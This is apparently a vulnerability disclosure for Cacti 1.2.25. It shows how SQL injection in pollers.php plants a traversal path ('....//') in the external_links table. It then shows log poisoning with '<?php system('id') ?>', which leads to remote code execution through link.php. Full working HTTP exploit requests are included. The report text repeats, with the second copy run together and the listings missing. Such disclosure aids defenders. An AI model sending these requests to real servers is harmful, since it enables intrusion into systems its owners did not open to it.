Local File Inclusion (RCE)
Product: Cacti
Version: 1.2.25
Description: While using the detected SQL Injection and insufficient processing of the include file path, it is possible to execute arbitrary code on the server. Exploitation of the vulnerability is possible for an authorized user. The vulnerable component is the link.php. Impact of the vulnerability – execution of arbitrary code on the server.
Mitigation: Improve data escaping to prevent Local File Inclusion.
Research
Local File Inclusion was executed in the link.php. file.
Line 27 from the external_links table in the database requests information. Line 56 checks the permission to compare the id record with the one from the database. On line 79 the path to the file is formed, it will be checked for existence on line 81 and included on line 82.
Figure 1. Script link.php with the vulnerability of going outside the directory when using SQL Injection, considered earlier
Further in this report the way to execute arbitrary code on the server will be demonstrated.
First, you need to use the found SQL Injection to write some information into the external_links table. The most important thing is to write down the correct contentfile value.
Listing 1. Writing data via SQL Injection to the external_links table
POST /cacti/pollers.php?header=false HTTP/1.1
Host: ***.***.*.174:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101
Firefox/119.0
Accept: */*
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 419
Origin: http://***.***.*.174:8080
Connection: close
Referer: http://***.***.*.174:8080/cacti/pollers.php?action=edit&id=1
Cookie: CactiDateTime=Sat Oct 28 2023 22:51:39 GMT+0300 (�о�ква,
��анда��ное в�ем�); CactiTimeZone=180;
Cacti=acbmsv2adk9forvpkqt0njd1oc;
cacti_remembers=1%2C0%2C28a320bc68fa35780e2f050b1f2eb14c0f0adc1d11112f87cf2360dd1
bbdc939; CactiDateTime=Fri Oct 27 2023 12:27:36 GMT+0300 (�о�ква,
��анда��ное в�ем�); CactiTimeZone=180
__csrf_magic=sid%3A1f5ff4435f8a2bc44a869ed53a0024cbedd194d5%2C1698525354&name=Mai
n+Poller&hostname=unknown&timezone=¬es=&processes=1&threads=1&id=2&save_compon
ent_poller=1&dbhost=";INSERT%20INTO%20external_links%20(id,sortorder,enabled,cont
entfile,title,style)%20values%20(10,2,"on","....//....//....//....//opt/cacti/log
/cacti.log","Test","TAB");%20select%20*%20from%20poller%20where%201=1%20and%20"%"
="&action=save
After running an HTTP request with SQL Injection to write the required data to the external_links table, some information appeared.
Figure 2. Recorded data in the external_links table via SQL Injection
The entry with id = 10 contains the value ....//....//....//....//opt/cacti/log/cacti.log in the contentfile field. This value was chosen for two reasons:
- Using this value sanitization can be bypassed, which will lead to the construction of an arbitrary and valid path to any file in the system
Figure 3. Attempt to prevent going outside the directory
Figure 4. Demonstration of circumvention of the mechanism to prevent going outside the directory
- The file
/opt/cacti/log/cacti.log can be rewritten by the user www-data. This will allow to poison the file with a payload that will appear without sanitization in the log file /opt/cacti/log/cacti.log. Poisoning of the log file will happen using the previously found SQL Injection (Error-Based).
Listing 6. Poisoning the logging file /opt/cacti/log/cacti.log with data that will lead to remote code execution
POST /cacti/pollers.php?header=false HTTP/1.1
Host: ***.***.*.174:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101
Firefox/119.0
Accept: */*
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 295
Origin: http://***.***.*.174:8080
Connection: close
Referer: http://***.***.*.174:8080/cacti/pollers.php?action=edit&id=1
Cookie: CactiDateTime=Sat Oct 28 2023 22:51:39 GMT+0300 (�о�ква,
��анда��ное в�ем�); CactiTimeZone=180;
Cacti=acbmsv2adk9forvpkqt0njd1oc;
cacti_remembers=1%2C0%2C28a320bc68fa35780e2f050b1f2eb14c0f0adc1d11112f87cf2360dd1
bbdc939; CactiDateTime=Fri Oct 27 2023 12:27:36 GMT+0300 (�о�ква,
��анда��ное в�ем�); CactiTimeZone=180
__csrf_magic=sid%3A1f5ff4435f8a2bc44a869ed53a0024cbedd194d5%2C1698525354&name=Mai
n+Poller&hostname=unknown&timezone=¬es=&processes=1&threads=1&id=2&save_compon
ent_poller=1&dbhost="%20and%20updatexml(rand(),concat(CHAR(126),'<?php+system(\'i
d\')+?>',CHAR(126)),null)%20and%20"%"="%&action=save
Figure 5. HTTP request and HTTP response poisoning of the logging file /opt/cacti/log/cacti.log
After executing the request, a payload injected via Error-Based SQL Injection with the value <?php system('id'); ?> appeared in the file /opt/cacti/log/cacti.log.
Figure 6. Demonstration of the sent logging file /opt/cacti/log/cacti.log using Error-Based SQL Injection
All that remains is to make sure that the is_realm_allowed function returns a positive result - then execution begins in the desired direction. This can be achieved by giving permission to the user (Configuration -> Users -> User -> Permissions -> External Link Permissions).
Figure 7. Enabling external link resolution for the current user
The Test item appeared in the menu (which was written to the database using SQL Injection). When you click on it, the poisoned log file is connected and the php code is executed on the server. In this case, the result of executing the system('id') command is visible.
Figure 8. Demonstration of remote code execution on the server when using the system('id') command
Researcher: Aleksey Solovev (Positive Technologies)
012git012 Reporter
netniV Coordinator
TheWitness Remediation developer
Local File Inclusion (RCE)
Product: Cacti
Version: 1.2.25
Description: While using the detected SQL Injection and insufficient processing of the include file path, it is possible to execute arbitrary code on the server. Exploitation of the vulnerability is possible for an authorized user. The vulnerable component is the
link.php. Impact of the vulnerability – execution of arbitrary code on the server.Mitigation: Improve data escaping to prevent Local File Inclusion.
Research
Local File Inclusion was executed in the
link.php.file.Line 27 from the
external_linkstable in the database requests information. Line 56 checks the permission to compare theidrecord with the one from the database. On line 79 the path to the file is formed, it will be checked for existence on line 81 and included on line 82.Figure 1. Script
link.phpwith the vulnerability of going outside the directory when using SQL Injection, considered earlierFurther in this report the way to execute arbitrary code on the server will be demonstrated.
First, you need to use the found SQL Injection to write some information into the
external_linkstable. The most important thing is to write down the correctcontentfilevalue.Listing 1. Writing data via SQL Injection to the
external_linkstableAfter running an HTTP request with SQL Injection to write the required data to the
external_linkstable, some information appeared.Figure 2. Recorded data in the
external_linkstable via SQL InjectionThe entry with
id = 10contains the value....//....//....//....//opt/cacti/log/cacti.login thecontentfilefield. This value was chosen for two reasons:Figure 3. Attempt to prevent going outside the directory
Figure 4. Demonstration of circumvention of the mechanism to prevent going outside the directory
/opt/cacti/log/cacti.logcan be rewritten by the userwww-data. This will allow to poison the file with a payload that will appear without sanitization in the log file/opt/cacti/log/cacti.log. Poisoning of the log file will happen using the previously found SQL Injection (Error-Based).Listing 6. Poisoning the logging file
/opt/cacti/log/cacti.logwith data that will lead to remote code executionFigure 5. HTTP request and HTTP response poisoning of the logging file
/opt/cacti/log/cacti.logAfter executing the request, a payload injected via Error-Based SQL Injection with the value
<?php system('id'); ?>appeared in the file/opt/cacti/log/cacti.log.Figure 6. Demonstration of the sent logging file
/opt/cacti/log/cacti.logusing Error-Based SQL InjectionAll that remains is to make sure that the
is_realm_allowedfunction returns a positive result - then execution begins in the desired direction. This can be achieved by giving permission to the user (Configuration -> Users -> User -> Permissions -> External Link Permissions).Figure 7. Enabling external link resolution for the current user
The Test item appeared in the menu (which was written to the database using SQL Injection). When you click on it, the poisoned log file is connected and the php code is executed on the server. In this case, the result of executing the system('id') command is visible.
Figure 8. Demonstration of remote code execution on the server when using the system('id') command
Researcher: Aleksey Solovev (Positive Technologies)